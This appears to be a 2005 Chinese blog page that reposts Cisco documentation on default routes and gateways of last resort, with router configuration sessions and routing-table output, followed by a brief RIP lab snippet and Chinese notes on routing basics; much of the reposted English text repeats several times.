2005年07月22日

来自cisco官方网站
ip default-gateway

ip default-network

and ip route 0.0.0.0 0.0.0.0

ip default-gateway

The ip default-gateway command differs from the other two commands. It should only be used when ip routing is disabled on the Cisco router.

For instance, if the router is a host in the IP world, you can use this command to define a default gateway for it. You might also use this command when your low end Cisco router is in boot mode in order to TFTP a Cisco IOS? Software image to the router. In boot mode, the router does not have ip routing enabled.

This example defines the router on IP address 172.16.15.4 as the default route:

ip default-gateway 172.16.15.4

ip default-network

Unlike the ip default-gateway command, you can use ip default-network when ip routing is enabled on the Cisco router. When you configure ip default-network the router considers routes to that network for installation as the gateway of last resort on the router.

For every network configured with ip default-network, if a router has a route to that network, that route is flagged as a candidate default route. This network diagram displays the routing table taken from router 2513:


2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S    198.10.1.0/24 [1/0] via 161.44.192.2

Note the static route to 198.10.1.0 via 161.44.192.2 and that the gateway of last resort is not set. If you configure ip default-network 198.10.1.0, the routing table changes to this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
R1#
2513#show ip protocols
2513#

The gateway of last resort is now set as 161.44.192.2. This result is independent of any routing protocol, as shown by the show ip protocols command at the bottom of the output.

You can add another candidate default route by configuring another instance of ip default-network:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
2513(config)#ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#ip default-network 171.70.24.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S       171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

After the ip default-network command was entered in the output above, the network was not flagged as a default network. The Flag a Default Network section explains why.

Flag a Default Network

Note:?/B>The ip default-network command is classful. This means that if the router has a route to the subnet indicated by this command, it installs the route to the major net. At this point neither network has been flagged as the default network. The ip default-network command must be issued again, using the major net, in order to flag the candidate default route.

2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. This network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note:?/B>IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. This network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note:?/B>IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

R1

route1(config)#route ip

roue1(config-router)#network 192.168.1.0

roue1(config-router)#network 192.168.101.0

R2

route1(config)#route ip

roue1(config-router)#network 192.168.1.0

roue1(config-router)#network 192.168.100.0

tips:The others is as same as lab5.

2005年07月21日

第 一 章 : 路 由 选 择 原 理
1.1路由选择基础知识
路由是将对象从一个地方转达发到另一个地方的一个中继过程
学习和维持网络拓朴结构知识的机制被认为是路由功能。渡越数据流经路由器进入接口
穿过路由器被移送到外出接口的过程,是另一项单独的功能,被认为是交换/转发功能。路由设备必须同时具有路由和交换的功能才可以作为一台有效的中继设备。
为了进行路由,路由器必须知道下面三项内容:
l路由器必须确定它是否激活了对该协议组的支持;
l路由器必须知道目的地网络;
l路由器必须知道哪个外出接口是到达目的地的最佳路。 


路由选择协议通过度量值来决定到达目的地的最佳路径。小度量值代表优选的路径;如果两条或更多路径都有一个相同的小度量值,那么所有这些路径将被平等地分享。通过多条路径分流数据流量被称为到目的地的负载均衡。

执行路由*作所需要的信息被包含在路由器的路由表中,它们由一个或多个路由选择协议进程生成。路由表由多个路由条目组成,每个条目指明了以下内容:
l学习该路由所用的机制(动态或手动)
l逻辑目的地
l管理距离
l度量值(它是度量一条路径的总"总开销"的一个尺度)
l去往目的地下一HOP的中继设备(路由器)的地址;
l路由信息的新旧程度
l与要去往目的地网络相关联的接口
使用命令SHOW IP ROUTE可看到以上内容

缺省管理距离的预先分配原则是:人工设置的路由条目优先级高于动态学到路由条目,度量值算法复杂的路由选择协议优先级高于度量值算法简单的路由选择协议。

路由器一般选择具有最小度量值的路径;CISCO路由器的IP环境中如果同时出现了多条度量值最低且相同的路径,那么在这多条路径上将启用负载均衡,C ISCO默认支持4条相同度量值的路径,通过使用"maximum-paths"命令可以认CISCO路由器支持最多达6条相同度量值路径。

RIP是一种用在小到中型TCP/IP网络中采用的路由选择协议,它采用跳数作为度量值,它的负载均衡功能是缺省启用的,RIP决定最佳路径时是不考虑带宽的!!!
IGRP是一种用在中到大型TCP/IP网络中采用的路由选择协议,它采用复合的度量值,它考虑了带宽、延迟、可靠性、负载和最大传输单元(M TU),但缺省地使用了带宽和延时值。IGRP也能进行负载均衡
在路由器启动之后,它立刻试图与其相邻路由设备建立路由关系。该初始通信的目的是为了识别相邻设备,并且开始进行通信并学习网络相结构。建立相邻关系的方法和对拓朴结构的初始学习随路由选择协议的不同而不同。
路由选择协议会交换定期的HELLO消息或定期的路由更新数据包,以维持相邻设备间进行着通信。
在了解了网络拓朴结构,且路由表中已包含了到已知地网络的最佳路径后,向这些目的地的数据转发就可以开始了;)

